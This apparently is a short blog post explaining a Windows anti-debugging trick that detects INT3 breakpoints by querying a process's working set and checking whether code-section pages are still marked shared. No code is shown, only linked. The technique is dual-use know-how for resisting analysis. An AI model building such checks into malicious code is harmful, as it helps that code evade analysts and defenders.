In this post i will share with you an Anti-Debugging trick that is very similar to the "PAGE_EXECUTE_WRITECOPY" trick mentioned here, where we had to flag code section as writeable such that any memory write to its page(s) would force OS to change the page protection from PAGE_EXECUTE_WRITECOPY to PAGE_EXECUTE_READWRITE. But in this case we don't have to make any modifications to the code section's page protection. We will just query the process for its current working set info. Among the stuff we receive querying the working set of a process are two fields, "Shared" and "ShareCount".
By default the OS assumes the memory pages of code section (Non-writable sections) should share physical memory across all process instances. This is true till one process instance commits a memory-write to the shared page. At this point the page becomes no longer shared. Thus, querying the working set of the process and inspecting the "Shared" and/or "ShareCount" fields for our Code section pages would reveal the presence of debugger, only if the debugger uses INT3 for breakpoints.
N.B. You can also use the "ZwQueryVirtualMemory" function with the "MemoryInformationClass" parameter set to MemoryWorkingSetList for more portable code.
Code from here and demo from here. Tested on Windows 7.
For any suggestions, leave me a comment or drop me a mail [email protected].